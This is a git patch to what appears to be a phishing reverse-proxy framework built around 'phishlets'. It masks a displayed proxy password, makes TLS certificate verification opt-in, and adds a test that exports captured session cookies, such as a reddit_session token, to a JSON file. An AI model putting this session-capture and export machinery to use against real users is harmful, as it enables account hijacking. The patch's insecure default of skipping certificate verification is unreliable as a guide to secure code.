From 954b42e104d784857c6ed263ebd3b375836d3453 Mon Sep 17 00:00:00 2001 From: JamesCullum Date: Fri, 9 Oct 2020 10:06:21 +0200 Subject: [PATCH] Remove full printing of proxy password, test session export to file, allow verifying TLS certificates (opt-in) --- .gitignore | 1 + core/banner.go | 2 +- core/certdb.go | 4 +++- core/http_proxy.go | 5 +++-- core/terminal.go | 10 +++++++++- main_test.go | 12 ++++++++++++ 6 files changed, 29 insertions(+), 5 deletions(-) diff --git a/.gitignore b/.gitignore index 0ad73d3..df99868 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,4 @@ phishlets/test-* /*.exe /tmp_cfg +/export.json diff --git a/core/banner.go b/core/banner.go index 7748695..f58ac35 100644 --- a/core/banner.go +++ b/core/banner.go @@ -8,7 +8,7 @@ import ( ) const ( - VERSION = "2.4.2" + VERSION = "2.4.3" ) func putAsciiArt(s string) { diff --git a/core/certdb.go b/core/certdb.go index 742c292..686828e 100644 --- a/core/certdb.go +++ b/core/certdb.go @@ -394,7 +394,9 @@ func (d *CertDb) registerCertificate(domains []string) (*certificate.Resource, e func (d *CertDb) getServerCertificate(host string, port int) *x509.Certificate { log.Debug("Fetching TLS certificate from %s:%d ...", host, port) - config := tls.Config{InsecureSkipVerify: true} + config := tls.Config{ + InsecureSkipVerify: (os.Getenv("VALIDATETLS") != "YES"), + } conn, err := tls.Dial("tcp", fmt.Sprintf("%s:%d", host, port), &config) if err != nil { log.Warning("Could not fetch TLS certificate from %s:%d: %s", host, port, err) diff --git a/core/http_proxy.go b/core/http_proxy.go index 25cd000..3b5394d 100644 --- a/core/http_proxy.go +++ b/core/http_proxy.go @@ -1080,6 +1080,7 @@ func (p *HttpProxy) patchUrls(pl *Phishlet, body []byte, c_type int) []byte { func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (*tls.Config, error) { return func(host string, ctx *goproxy.ProxyCtx) (c *tls.Config, err error) { + skipVerify := (os.Getenv("VALIDATETLS") != "YES") parts := strings.SplitN(host, ":", 2) hostname := parts[0] port := 443 @@ -1105,7 +1106,7 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) ( } if cert != nil { return &tls.Config{ - InsecureSkipVerify: true, + InsecureSkipVerify: skipVerify, Certificates: []tls.Certificate{*cert}, }, nil } @@ -1127,7 +1128,7 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) ( return nil, err } return &tls.Config{ - InsecureSkipVerify: true, + InsecureSkipVerify: skipVerify, Certificates: []tls.Certificate{*cert}, }, nil } diff --git a/core/terminal.go b/core/terminal.go index d150bf3..83e3f5c 100644 --- a/core/terminal.go +++ b/core/terminal.go @@ -257,8 +257,16 @@ func (t *Terminal) handleProxy(args []string) error { proxy_enabled = "yes" } + var censoredPassword string + for i, passChar := range t.cfg.proxyPassword { + appendChar := passChar + if i > 2 { + appendChar = '*' + } + censoredPassword = censoredPassword + string(appendChar) + } keys := []string{"enabled", "type", "address", "port", "username", "password"} - vals := []string{proxy_enabled, t.cfg.proxyType, t.cfg.proxyAddress, strconv.Itoa(t.cfg.proxyPort), t.cfg.proxyUsername, t.cfg.proxyPassword} + vals := []string{proxy_enabled, t.cfg.proxyType, t.cfg.proxyAddress, strconv.Itoa(t.cfg.proxyPort), t.cfg.proxyUsername, censoredPassword} log.Printf("\n%s\n", AsRows(keys, vals)) return nil } else if pn == 1 { diff --git a/main_test.go b/main_test.go index 7e588ae..c48e3e3 100644 --- a/main_test.go +++ b/main_test.go @@ -136,6 +136,18 @@ func TestStart(t *testing.T) { terminal.ProcessCommand("sessions 1") test.assertLogContains("captured", "Session token captured") test.assertLogContains(`","name":"reddit_session","httpOnly":true`, "Session cookie displayed") + test.Clear() + + exportPath := path+"/export.json" + os.RemoveAll(exportPath) + terminal.ProcessCommand("sessions export json "+strings.ReplaceAll(exportPath, `\`, `\\`)) + test.assertLogContains("exported sessions to json", "Can export sessions to file") + time.Sleep(1 * time.Second) + readDump, err := ioutil.ReadFile(exportPath) + test.outputResult( + (err == nil && strings.Contains(string(readDump), `"id":"1"`)), + "Dumped sessions are valid", + ) //log.Println(buf.String()) }